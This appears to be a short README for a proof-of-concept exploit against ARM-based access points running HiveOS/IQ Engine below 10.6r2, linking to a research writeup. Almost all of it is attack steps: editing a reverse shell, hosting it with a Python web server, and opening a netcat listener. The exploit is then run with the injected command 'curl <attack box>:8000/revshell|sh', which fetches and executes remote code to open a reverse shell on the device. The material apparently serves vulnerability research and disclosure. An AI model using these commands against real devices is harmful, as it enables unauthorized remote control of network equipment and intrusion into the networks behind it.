PoC for ARM-based access points running HiveOS/IQ Engine <10.6r2.
- Edit
revshellto point to your shell catcher IP/port - Host the reverse shell:
python3 -m http.server - Open a shell catcher:
nc -lvnp 1337 - Run the POC (may take a few minutes):
python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"
Writeup here: https://research.aurainfosec.io/pentest/bee-yond-capacity/
